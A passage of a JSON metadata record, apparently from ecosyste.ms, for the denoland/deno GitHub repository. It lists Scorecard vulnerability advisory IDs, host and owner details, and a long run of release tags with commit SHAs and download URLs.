vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.e